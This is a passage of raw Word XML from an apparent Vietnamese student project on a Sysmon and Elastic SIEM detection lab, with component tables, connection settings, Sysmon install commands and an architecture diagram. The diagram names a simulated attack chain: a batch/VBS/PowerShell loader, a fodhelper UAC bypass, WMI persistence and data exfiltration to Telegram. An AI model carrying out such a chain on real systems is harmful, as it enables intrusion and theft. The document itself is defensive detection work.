          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ánh xạ toàn bộ kỹ thuật tấn công với MITRE ATT&amp;CK Framework v15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D3CA77" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Đánh giá khả năng phát hiện và đề xuất hướng phát triển cho hệ thống detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0AF247" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FAB6A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.1 Tổng Quan Kiến Trúc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AFEAEE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Môi trường lab được triển khai theo mô hình kết hợp giữa máy ảo Windows 10 cục bộ đóng vai trò endpoint (nạn nhân) và Elastic Stack 9.x được host trên Kibana Cloud (Elastic Cloud). Kiến trúc này cho phép mô phỏng kịch bản APT thực tế trong điều kiện kiểm soát, đồng thời tận dụng hạ tầng SIEM cloud để giảm chi phí triển khai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F758402" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Cấu Hình Các Thành Phần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1"/>
        <w:gridCol w:w="1955"/>
        <w:gridCol w:w="2335"/>
        <w:gridCol w:w="2765"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01B4A" w14:paraId="104A22B7" w14:textId="77777777">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0A563684" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thành phần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000"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28762E1C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phiên bản</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200"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58D3BEF0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cấu hình</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2826"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4E50E410" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vai trò</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="732B52CD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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7228559" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows 10 VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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2626A04" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Build 19045</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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48A0E9F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DESKTOP-GDP9KH5 | RAM 8GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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F5FA434" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Endpoint mục tiêu — nơi attack chain thực thi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="35BE61F9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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0148299" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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0DE318CD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>v15.15 Schema 4.90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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5C3B358E" w14:textId="218E0778" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sysmon-config.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="282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682748E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thu thập telemetry: EID 1, 3, 11, 13, 19, 20, 21, 23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="76C5DA44" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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3C166FF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Elastic Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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D9920CD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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68C1BFC" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fleet policy — Sysmon integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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81A5F47" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thu thập log, chuẩn hóa ECS, gửi về Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="0550534B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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F535ABE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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5BCCDE33" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.x (Cloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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5D7526B0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kibana Cloud Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="282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25A17CF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lưu trữ và index toàn bộ log events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="5B37EF83" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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59817B8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kibana SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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6D2E5E0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.x (Cloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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3C9C247" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Security module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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E2EF9F5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Alert engine, visualization, investigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="7E4A1BED" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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0BEC67AF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Telegram Bot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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0752580E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Bot API v7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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D08BC64" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>@elk_siem_alert_ttcs_bot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="282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53304814" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Realtime alert notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C1E4C2E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315D6EEF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Cấu Hình Kết Nối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687581CA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Elastic Agent trên Windows 10 VM được cấu hình kết nối đến Elastic Cloud qua HTTPS, gửi log về Fleet Server. Toàn bộ traffic sử dụng TLS 1.3, đảm bảo tính bảo mật của pipeline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01B4A" w14:paraId="5B4B1B74" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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7F0120B5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fleet Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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950C965" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kibana Cloud (Elastic Cloud) — HTTPS:8220</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="5012E97D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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6B692354" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Elasticsearch Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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B7D46D3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Elastic Cloud — HTTPS:9243</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="1064B42D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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00943C47" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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1D9176E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTPS / TLS 1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="23BB3A01" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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0260DFCB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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976201F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Service Token (Elastic Agent enrollment token)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="72049C55" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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60AD02B1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Index Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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84D2155" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>logs-windows.sysmon_operational-default</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="7F9EC561" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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35EE5CA5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Alert Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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464F1D9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Webhook → Telegram Bot API (api.telegram.org:443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0907193F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771F02B1" w14:textId="77777777" w:rsidR="004B4A29" w:rsidRDefault="004B4A29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="706034DD" w14:textId="357C2833" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.4 Sơ Đồ Kiến Trúc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D8FE38" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Windows 10 VM (DESKTOP-GDP9KH5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D6E9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12A8F5FF"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[Attacker] setup.bat chạy → r.vbs → payload.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F1E84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 UAC bypass (fodhelper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39684E1F"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 WMI persistence (svhw.ps1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7189D7CC"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 WMI trigger (notepad.exe) → collection → exfil Telegram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5028937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3FADF48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[Sysmon v15.15] Thu thập: EID 1,3,11,13,19,20,21,23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F89BC27"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 Windows Event Log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203DBF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591B5F1C"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[Elastic Agent 9.3.1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1CAC1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 HTTPS/TLS 8220</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0902859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40CB8ACF"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Elastic Cloud ────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98ED5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14D5B052"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Elasticsearch 9.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D9F67B"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logs-windows.sysmon_operational-default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D1AB78"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3EABEBD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Kibana SIEM — Detection Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648286DE" w14:textId="7DDC4E18"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EQL Rules: C1-C</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, S1-S</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7CD999"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 Alert fire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B4B274"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2D2EC6F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Webhook Connector → Telegram Bot API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76939565" w14:textId="5EBCA59A" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        @elk_siem_alert_ttcs_bot → Chat ID: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D72F37" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B1DA2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IV. CÀI ĐẶT VÀ CẤU HÌNH SYSMON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EECA2B8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Giới Thiệu về Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B6901" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sysmon (System Monitor) là công cụ giám sát hệ thống của Microsoft Sysinternals, ghi nhật ký chi tiết các hoạt động Windows vào Event Log với thông tin phong phú hơn nhiều so với Event Log tiêu chuẩn: command line đầy đủ của tiến trình, hash file, kết nối mạng với destination IP/port, thay đổi registry với value data, và các sự kiện WMI. Đây là log source chính và bắt buộc cho toàn bộ detection rules trong đồ án.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2767FE17" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Cài Đặt và Áp Dụng Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B9112" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Cài đặt Sysmon với config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14493BC7" w14:textId="5726B37C"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sysmon64.exe -accepteula -i sysmon-config.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58870BC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4FDB7389" w14:textId="2EB63D46"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Cập nhật config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EC28FC" w14:textId="61A6C2C2"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sysmon64.exe -c sysmon-config.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED19B2"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18FFACD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Xác nhận Sysmon đang chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239577D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Get-Service Sysmon64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38222EA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12643FB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Xem log Sysmon trong Event Viewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEE20A9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
